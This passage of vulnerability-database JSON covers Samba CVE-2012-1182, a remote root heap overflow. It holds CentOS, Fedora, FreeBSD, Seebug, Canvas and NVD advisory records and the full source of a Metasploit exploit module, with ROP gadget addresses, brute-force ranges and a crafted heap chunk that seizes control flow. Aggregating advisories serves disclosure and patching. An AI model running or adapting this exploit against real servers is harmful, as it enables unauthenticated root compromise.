(CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which\nprovides a number of bug fixes and enhancements over the previous version.\nIn particular, interoperability with Active Directory (AD)\ndomains is improved. SSSD now uses the libndr-krb5pac library to parse the Privilege\nAttribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client library,\nis included as a Technology Preview. This functionality and the server\nlibraries are included as a Technology Preview. This functionality uses the\nlibndr-nbt library to prepare Connection-less Lightweight Directory Access\nProtocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security\nAuthority (LSA) and Net Logon services to allow verification of trust\nfrom a Windows system. Because the Cross Realm Kerberos Trust functionality\nis considered a Technology Preview, selected samba4 components are\nconsidered to be a Technology Preview. For more information on which Samba\npackages are considered a Technology Preview, refer to Table 5.1, \"Samba4\nPackage Support\" in the Release Notes, linked to from the References.\n(BZ#766333, BZ#882188)\n\nThis update also fixes the following bug:\n\n* Prior to this update, if the Active Directory (AD) server was rebooted,\nWinbind sometimes failed to reconnect when requested by \"wbinfo -n\" or\n\"wbinfo -s\" commands. Consequently, looking up users using the wbinfo tool\nfailed. 
This update applies upstream patches to fix this problem and now\nlooking up a Security Identifier (SID) for a username, or a username for a\ngiven SID, works as expected after a domain controller is rebooted.\n(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure that\nyou uninstall the package named \"samba4\" to avoid conflicts during the\nupgrade.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2013-March/056417.html\nhttps://lists.centos.org/pipermail/centos-cr-announce/2013-February/013579.html\n\n**Affected packages:**\nsamba4\nsamba4-client\nsamba4-common\nsamba4-dc\nsamba4-dc-libs\nsamba4-devel\nsamba4-libs\nsamba4-pidl\nsamba4-python\nsamba4-swat\nsamba4-test\nsamba4-winbind\nsamba4-winbind-clients\nsamba4-winbind-krb5-locator\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2013:0506", "cvss3": {}, "published": "2013-02-27T19:38:13", "type": "centos", "title": "samba4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2013-03-09T00:42:54", "id": "CESA-2013:0506", "href": "https://lists.centos.org/pipermail/centos-cr-announce/2013-February/013579.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-27T11:55:42", 
"description": "**CentOS Errata and Security Advisory** CESA-2012:0465\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2012-April/055481.html\nhttps://lists.centos.org/pipermail/centos-announce/2012-April/055484.html\n\n**Affected packages:**\nlibsmbclient\nlibsmbclient-devel\nsamba\nsamba-client\nsamba-common\nsamba-doc\nsamba-domainjoin-gui\nsamba-swat\nsamba-winbind\nsamba-winbind-clients\nsamba-winbind-devel\nsamba-winbind-krb5-locator\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2012:0465", "cvss3": {}, "published": "2012-04-10T21:30:27", "type": "centos", "title": "libsmbclient, samba security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T23:59:51", "id": "CESA-2012:0465", "href": "https://lists.centos.org/pipermail/centos-announce/2012-April/055481.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "description": " Samba 4 is the ambitious next version of the Samba suite that is being developed in parallel to the stable 3.0 series. The main emphasis in this branch is support for the Active Directory logon protocols used by Windows 2000 and above. ", "edition": 2, "cvss3": {}, "published": "2012-05-15T23:28:34", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: samba4-4.0.0-38.alpha16.fc16", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-05-15T23:28:34", "id": "FEDORA:7D08020F24", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "description": " Samba 4 is the ambitious next version of the Samba suite that is being developed in parallel to the stable 3.0 series. The main emphasis in this branch is support for the Active Directory logon protocols used by Windows 2000 and above. 
", "edition": 2, "cvss3": {}, "published": "2012-05-03T07:32:37", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: samba4-4.0.0-26.alpha11.fc15.6", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-05-03T07:32:37", "id": "FEDORA:77AFB20FC7", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:53:36", "description": "CVE ID: CVE-2012-1182\r\n\r\nSamba\u662f\u4e00\u5957\u5b9e\u73b0SMB\uff08Server Messages Block\uff09\u534f\u8bae\u3001\u8de8\u5e73\u53f0\u8fdb\u884c\u6587\u4ef6\u5171\u4eab\u548c\u6253\u5370\u5171\u4eab\u670d\u52a1\u7684\u7a0b\u5e8f\u3002\r\n\r\nSamba 3.6.3\u4e4b\u524d\u7248\u672c\u7684RPC\u4ee3\u7801\u751f\u6210\u5668\u5b58\u5728\u9519\u8bef\uff0c\u5bfc\u81f4\u751f\u6210\u7684\u4ee3\u7801\u4e2d\u5305\u542b\u5b89\u5168\u6f0f\u6d1e\uff0c\u8fd9\u4e9b\u751f\u6210\u7684\u4ee3\u7801\u7528\u5728Samba\u63a7\u5236RPC\u7f51\u7edc\u6570\u636e\u5904\u7406\u7684\u90e8\u5206\u3002\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u7279\u5236\u7684RPC\u8c03\u7528\u65e0\u9700\u7528\u6237\u9a8c\u8bc1\u9020\u6210\u670d\u52a1\u5668\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nSamba < 
3.6.3\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nSamba\r\n-----\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.samba.org/", "cvss3": {}, "published": "2012-04-12T00:00:00", "type": "seebug", "title": "Samba < 3.6.3 \u7248\u672cndr_pull_lsa_SidArray\u5806\u6ea2\u51fa\u6f0f\u6d1e(CVE-2012-1182)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60050", "id": "SSV:60050", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-13T00:14:50", "description": "This module triggers a vulnerability in the LSA RPC service of the Samba daemon because of an error on the PIDL auto-generated code. Making a specially crafted call to SetInformationPolicy to set a PolicyAuditEventsInformation allows to trigger a heap overflow and finally execute arbitrary code with root privileges. The module uses brute force to guess the stackpivot/rop chain or the system() address and redirect flow there in order to bypass NX. The start and stop addresses for brute forcing have been calculated empirically. 
On the other hand the module provides the StartBrute and StopBrute which allow the user to configure his own addresses.\n", "edition": 2, "cvss3": {}, "published": "2012-09-27T23:18:52", "type": "metasploit", "title": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/SAMBA/SETINFOPOLICY_HEAP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::RopDb\n include Msf::Exploit::Brute\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Samba SetInformationPolicy AuditEventsInfo Heap Overflow',\n 'Description' => %q{\n This module triggers a vulnerability in the LSA RPC service of the Samba daemon\n because of an error on the PIDL auto-generated code. Making a specially crafted\n call to SetInformationPolicy to set a PolicyAuditEventsInformation allows to\n trigger a heap overflow and finally execute arbitrary code with root privileges.\n\n The module uses brute force to guess the stackpivot/rop chain or the system()\n address and redirect flow there in order to bypass NX. The start and stop addresses\n for brute forcing have been calculated empirically. 
On the other hand the module\n provides the StartBrute and StopBrute which allow the user to configure his own\n addresses.\n },\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery\n 'blasty', # Exploit\n 'mephos', # Metasploit module\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2012-1182'],\n ['OSVDB', '81303'],\n ['BID', '52973'],\n ['ZDI', '12-069']\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 600,\n },\n 'Platform' => %w{ linux unix },\n # smbd process is killed soon after being exploited, need fork with meterpreter\n 'DefaultOptions' => { \"PrependSetreuid\" => true, \"PrependSetregid\" => true, \"PrependFork\" => true, \"AppendExit\" => true, \"WfsDelay\" => 5},\n 'Targets' =>\n [\n ['2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',\n 'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb67f1000 },\n 'Stop' => { 'libgcrypt_base' => 0xb69ef000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.10',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',\n 'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb68d9000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6ad7000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.04',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 11.04 / 2:3.5.8~dfsg-1ubuntu2',\n # when stack pivoting, we control dword [esi] (field \"next\" in talloc chunk), ecx and [esp+4] point to shellcode\n 'Stackpivot' => 0x0006af03, # pop ecx ; jmp dword [esi] in 
/lib/i386-linux-gnu/libgcrypt.so.11.6.0\n # we jump on \"pop ecx, jmp dword [esi] to remove 4 bytes from the stack, then jump on pop esp.. gadget\n # to effectively stack pivot\n 'Stackpivot_helper' => 0x00054e87, #pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret ;\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb6973000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6b71000 },\n 'Step' => 0x1000\n }\n }\n ],\n # default version when installing 11.04 is 3.5.8 , 3.5.4 was PROPOSED on CD months before release date\n #['2:3.5.4~dfsg-1ubuntu8 on Ubuntu 11.04',\n #\t{\n #\t\t'Arch' => ARCH_CMD,\n #\t\t'Offset' => 0x11c0,\n #\t\t'Ropname' => 'Ubuntu 11.04 / 2:3.5.4~dfsg-1ubuntu8',\n #\t\t'Stackpivot' => 0,\n #\t\t'Bruteforce' =>\n #\t\t{\n #\t\t\t# The start should be 0x950 aligned, and then step 0x1000.\n #\t\t\t'Start' => { 'Ret' => 0x00230950 },\n #\t\t\t'Stop' => { 'Ret' => 0x22a00950 },\n #\t\t\t'Step' => 0x1000\n #\t\t}\n #\t}\n #],\n ['2:3.5.4~dfsg-1ubuntu8 on Ubuntu Server 10.10',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8',\n 'Stackpivot' => 0x0003e4bc, #xchg eax, esp ; ret in libgcrypt.so.11.5.3\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb694f000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6b4d000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Debian Squeeze / 2:3.5.6~dfsg-3squeeze6',\n 'Stackpivot' => 0x0003e30c, #xchg eax, esp ; ret in libgcrypt.so.11.5.3\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb6962000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6a61000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['3.5.10-0.107.el5 on CentOS 5',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => '3.5.10-0.107.el5 on CentOS 5',\n 'Stackpivot' => 0x0006ad7e, #xchg eax, esp ; xchg eax, ebx ; add eax, 0xCB313435 ; or ecx, eax ; ret in libgcrypt.so.11.5.2\n 'Bruteforce' =>\n {\n 
'Start' => { 'libgcrypt_base' => 0x0037c000 },\n 'Stop' => { 'libgcrypt_base' => 0x09e73000 },\n 'Step' => 0x1000\n }\n }\n ]\n\n ],\n 'DisclosureDate' => '2012-04-10',\n 'DefaultTarget' => 0\n ))\n\n register_options([\n OptInt.new(\"StartBrute\", [ false, \"Start Address For Brute Forcing\" ]),\n OptInt.new(\"StopBrute\", [ false, \"Stop Address For Brute Forcing\" ])\n ])\n\n deregister_options('SMB::ProtocolVersion')\n end\n\n def exploit\n if target.bruteforce?\n bf = target.bruteforce\n\n if datastore['StartBrute'] and datastore['StartBrute'] > 0\n bf.start_addresses['libgcrypt_base'] = datastore['StartBrute']\n end\n\n if datastore['StopBrute'] and datastore['StopBrute'] > 0\n bf.stop_addresses['libgcrypt_base'] = datastore['StopBrute']\n end\n\n if bf.start_addresses['libgcrypt_base'] > bf.stop_addresses['libgcrypt_base']\n raise ArgumentError, \"StartBrute should not be larger than StopBrute\"\n end\n end\n super\n end\n\n def brute_exploit(target_addrs)\n print_status(\"Trying to exploit Samba with address 0x%.8x...\" % target_addrs['libgcrypt_base'])\n datastore['DCERPC::fake_bind_multi'] = false\n datastore['DCERPC::max_frag_size'] = 4248\n datastore['DCERPC::smb_pipeio'] = 'trans'\n datastore['DCERPC::ReadTimeout'] = 3\n\n pipe = \"lsarpc\"\n\n vprint_status('Use Rex client (SMB1 only) since this module is not compatible with RubySMB client')\n connect(versions: [1])\n smb_login()\n\n handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', [\"\\\\#{pipe}\"])\n dcerpc_bind(handle)\n dcerpc.socket.mode = 'rw'\n # revert for other exploits\n datastore['DCERPC::smb_pipeio'] = 'rw'\n\n cmd = \";;;;\" # padding\n helper = 0\n if target['Arch'] == ARCH_CMD\n cmd << \"#{payload.encoded}\\x00\" # system argument\n tmp = cmd * (816/cmd.length)\n tmp << \"\\x00\"*(816-tmp.length)\n ret_addr = addr\n elsif target['Arch'] == ARCH_X86\n cmd << generate_rop_payload('samba', payload.encoded,{'target'=>target['Ropname'], 'base'=> 
target_addrs['libgcrypt_base'] })\n tmp = cmd\n tmp << \"\\x00\"*(816-tmp.length)\n ret_addr = target_addrs['libgcrypt_base']+target['Stackpivot']\n # will help in stack pivot when it's not eax pointing to shellcode\n if target['Stackpivot_helper']\n helper = target_addrs['libgcrypt_base']+target['Stackpivot_helper']\n end\n end\n\n stub = \"X\" * 20\n\n stub << NDR.short(2) # level\n stub << NDR.short(2) # level 2\n stub << NDR.long(1) # auditing mode\n stub << NDR.long(1) # ptr\n stub << NDR.long(100000) # r-> count\n stub << NDR.long(20) # array size\n stub << NDR.long(0)\n stub << NDR.long(100)\n stub << rand_text_alpha(target['Offset'])\n # Crafted talloc chunk\n #stub << 'A' * 8 # next, prev\n stub << NDR.long(helper) + 'A'*4 # next, prev\n stub << NDR.long(0) + NDR.long(0) # parent, child\n stub << NDR.long(0) # refs\n #\t\tstub << NDR.long(target_addrs['Ret']) # destructor # will become EIP\n stub << NDR.long(ret_addr) # destructor # will become EIP\n stub << NDR.long(0) # name\n stub << \"AAAA\" # size\n stub << NDR.long(0xe8150c70) # flags\n stub << \"AAAABBBB\"\n stub << tmp # pointer to tmp+4 in $esp\n stub << rand_text(32632)\n stub << rand_text(62000)\n\n begin\n call(dcerpc, 0x08, stub)\n rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError\n rescue Rex::Proto::DCERPC::Exceptions::Fault\n print_error('Server is most likely patched...')\n rescue Timeout::Error\n print_status(\"Timeout\")\n rescue Rex::Proto::SMB::Exceptions::LoginError\n print_status(\"Rex::Proto::SMB::Exceptions::LoginError\")\n rescue => e\n if e.to_s =~ /STATUS_PIPE_DISCONNECTED/\n print_status('Server disconnected, this is expected')\n end\n end\n handler()\n disconnect()\n end\n\n def check\n begin\n vprint_status('Connect with SMB1 for the check method, since it needs native_lm info')\n connect(versions: [1])\n smb_login()\n disconnect()\n\n version = smb_peer_lm().scan(/Samba (\\d\\.\\d.\\d*)/).flatten[0]\n minor = 
version.scan(/\\.(\\d*)$/).flatten[0].to_i\n vprint_status(\"Version found: #{version}\")\n\n return Exploit::CheckCode::Appears if version =~ /^3\\.4/ and minor < 16\n return Exploit::CheckCode::Appears if version =~ /^3\\.5/ and minor < 14\n return Exploit::CheckCode::Appears if version =~ /^3\\.6/ and minor < 4\n\n return Exploit::CheckCode::Safe\n\n rescue ::Exception\n return CheckCode::Unknown\n end\n end\n\n # Perform a DCE/RPC Function Call\n def call(dcerpc, function, data, do_recv = true)\n\n frag_size = data.length\n if dcerpc.options['frag_size']\n frag_size = dcerpc.options['frag_size']\n end\n object_id = ''\n if dcerpc.options['object_call']\n object_id = dcerpc.handle.uuid[0]\n end\n if options['random_object_id']\n object_id = Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))\n end\n\n call_packets = make_request(function, data, frag_size, dcerpc.context, object_id)\n call_packets.each { |packet|\n write(dcerpc, packet)\n }\n\n return true if not do_recv\n\n raw_response = ''\n\n begin\n raw_response = dcerpc.read()\n rescue ::EOFError\n raise Rex::Proto::DCERPC::Exceptions::NoResponse\n end\n\n if (raw_response == nil or raw_response.length == 0)\n raise Rex::Proto::DCERPC::Exceptions::NoResponse\n end\n\n\n dcerpc.last_response = Rex::Proto::DCERPC::Response.new(raw_response)\n\n if dcerpc.last_response.type == 3\n e = Rex::Proto::DCERPC::Exceptions::Fault.new\n e.fault = dcerpc.last_response.status\n raise e\n end\n\n dcerpc.last_response.stub_data\n end\n\n # Used to create standard DCERPC REQUEST packet(s)\n def make_request(opnum=0, data=\"\", size=data.length, ctx=0, object_id = '')\n\n opnum = opnum.to_i\n size = size.to_i\n ctx = ctx.to_i\n\n chunks, frags = [], []\n ptr = 0\n\n # Break the request into fragments of 'size' bytes\n while ptr < data.length\n chunks.push( data[ ptr, size ] )\n ptr += size\n end\n\n # Process requests with no stub data\n if chunks.length == 0\n frags.push( 
Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, '', ctx, object_id) )\n return frags\n end\n\n # Process requests with only one fragment\n if chunks.length == 1\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, chunks[0], ctx, object_id) )\n return frags\n end\n\n # Create the first fragment of the request\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(1, opnum, chunks.shift, ctx, object_id) )\n\n # Create all of the middle fragments\n while chunks.length != 1\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(0, opnum, chunks.shift, ctx, object_id) )\n end\n\n # Create the last fragment of the request\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(2, opnum, chunks.shift, ctx, object_id) )\n\n return frags\n end\n\n # Write data to the underlying socket\n def write(dcerpc, data)\n dcerpc.socket.write(data)\n data.length\n end\nend\n\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/samba/setinfopolicy_heap.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2021-07-28T14:33:37", "description": "**Name**| CVE_2012_1182 \n---|--- \n**CVE**| CVE-2012-1182 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CVE-2012-1182 \n**Notes**| References: http://www.samba.org \nCVE Name: CVE-2012-1182 \nVENDOR: Samba \nRepeatability: Repeatable \nDate Public: 04/10/2012 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-CVE-2012-1182 \nCVSS: 0.0 \n\n", "edition": 3, "cvss3": {}, "published": "2012-04-10T21:55:00", "title": "Immunity Canvas: CVE_2012_1182", "type": "canvas", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T21:55:00", "id": "CVE_2012_1182", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/CVE_2012_1182", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-25T14:13:35", "description": "**Name**| CVE_2012_1182_NONX \n---|--- \n**CVE**| CVE-2012-1182 \n**Exploit Pack**| [CANVAS](<http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CVE-2012-1182-NONX \n**Notes**| References: http://www.samba.org \nCVE Name: CVE-2012-1182 \nVENDOR: Samba \nRepeatability: Repeatable \nDate public: 04/10/2012 \nCVE Url: N/A \nCVSS: 0.0 \n\n", "edition": 2, "cvss3": {}, "published": "2012-04-10T17:55:02", "type": "canvas", "title": "Immunity Canvas: CVE_2012_1182_NONX", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T17:55:02", "id": "CVE_2012_1182_NONX", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/CVE_2012_1182_NONX", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2022-01-19T16:03:49", "description": "\n\nSamba development team reports:\n\nSamba versions 3.6.3 and all versions previous to this\n\t are affected by a 
vulnerability that allows remote code\n\t execution as the \"root\" user from an anonymous connection.\nAs this does not require an authenticated connection it\n\t is the most serious vulnerability possible in a program,\n\t and users and vendors are encouraged to patch their Samba\n\t installations immediately.\n\n\n", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "freebsd", "title": "samba -- \"root\" credential remote code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T00:00:00", "id": "BAF37CD2-8351-11E1-894E-00215C6A37BB", "href": "https://vuxml.freebsd.org/freebsd/baf37cd2-8351-11e1-894e-00215c6a37bb.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T11:57:20", "description": "The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an array length in a manner consistent with validation of array memory allocation, which allows remote attackers to execute arbitrary code via a crafted RPC call.", "cvss3": {}, "published": "2012-04-10T21:55:00", "type": "cve", "title": "CVE-2012-1182", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
